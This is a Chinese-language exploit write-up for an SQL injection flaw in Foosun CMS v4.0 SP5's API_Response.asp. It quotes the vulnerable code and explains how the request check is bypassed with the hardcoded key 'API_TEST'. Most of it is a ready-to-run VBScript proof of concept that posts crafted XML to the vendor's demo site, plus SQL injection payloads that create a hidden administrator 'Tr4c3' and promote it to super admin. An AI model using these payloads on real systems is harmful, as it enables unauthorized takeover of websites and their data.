风讯7月份最新注入漏洞利用

#漏洞文件 API/API_Response.asp
#影响版本: v4.0 Sp5[其他版本未看]
#漏洞原因: 变量username未经过滤传值，带入sql执行，导致注入产生。
#关键代码：

以下是引用片段： If CheckPost() Then Select Case Act Case “checkname” ‘触发注入 Checkname() CheckPost()函数原型在行73-96，username由此获取值，代码如下: XmlDoc.documentElement.selectSingleNode(”username”) Checkname()函数在行233-254，代码如下： Sub Checkname() Dim UserEmail Dim Temp_tr,i,Rs,Sql UserEmail = Trim(XmlDoc.documentElement.selectSingleNode(”email”).text) If Messenge<>”" Then ‘输出错误信息 Status = 1 Exit Sub End If Sql=”select UserName,Email From FS_ME_Users where UserName = ‘”& UserName &”‘” ‘在此带入sql执行 Set Rs = User_Conn.Execute(Sql) If Not Rs.Eof And Not Rs.Bof Then Messenge = “您填写的用户名已经被注册。” Status = 1 Exit Sub Else Status = 0 Messenge = “验证通过。” End If Rs.Close Set Rs = Nothing End Sub

利用的关键在于让CheckPost()为真，代码如下：

以下是引用片段： Dim NewMd5,OldMd5 NewMd5 = Md5(UserName&API_SysKey,16) ‘Const API_SysKey = “API_TEST” OldMd5 = Md5(UserName&API_SysKey,16) If Syskey=NewMd5 or Syskey=OldMd5 Then CheckPost = True Else Status = 1 Messenge = Messenge & “<li>请求数据验证不通过，请与管理员联系。” End If API_SysKey在Api_Config.asp里16行被设置 Const API_SysKey = “API_TEST”

把注入语句 & API_SysKey 进行一次md5加密之后的16位hash，赋值给syskey就可以了。

###Poc：

以下是引用片段： Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Rem   风讯4.0 sp5[mssql] 注入漏洞测试脚本 By Tr4c3[at]126[dot]com Rem   更多信息请关注: Rem      网安阵线 http://www.nspcn.org/ Rem      web安全手册 http://www.tr4c3.com/ Rem      BK瞬间[qq群] Rem   转载请保留以上版权 Dim strData, strUrl, strGetinfo, xPost strData = “<body><userip>999.999.999.999</userip><email>body@baidu.com</email><action>checkname</action><syskey>b77c8e0d7a0784d5</syskey><appid>FoosunCMS</appid><username>’</username></body>” strUrl = “http://demo.foosun.net/api/API_Response.asp” Set xPost = CreateObject(”Microsoft.XMLHTTP”) xPost.Open “POST”, strUrl, False xPost.SetRequestHeader “Content-Type”, “application/x-www-form-urlencoded” xPost.SetRequestHeader “Referer”, strUrl xPost.send(strData) ’strGetinfo = xPost.ResponseText strGetinfo = bytes2BSTR(xPost.ResponseBody) Wscript.echo(strGetinfo) Wscript.Quit Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Rem   将返回内容转换成简体中文 Function bytes2BSTR(vIn) strReturn = “” For i = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i,1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Rem ‘;insert into FS_MF_Admin (Admin_Name,Admin_Pass_Word)values(’Tr4c3′,’83aa400af464c76d’)– 添加一个普通管理员Tr4c3,密码12345678 Rem ‘;update FS_MF_Admin set Admin_Is_Super=1 where Admin_Name=’Tr4c3′– 把Tr4c3提升为超级管理员 Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-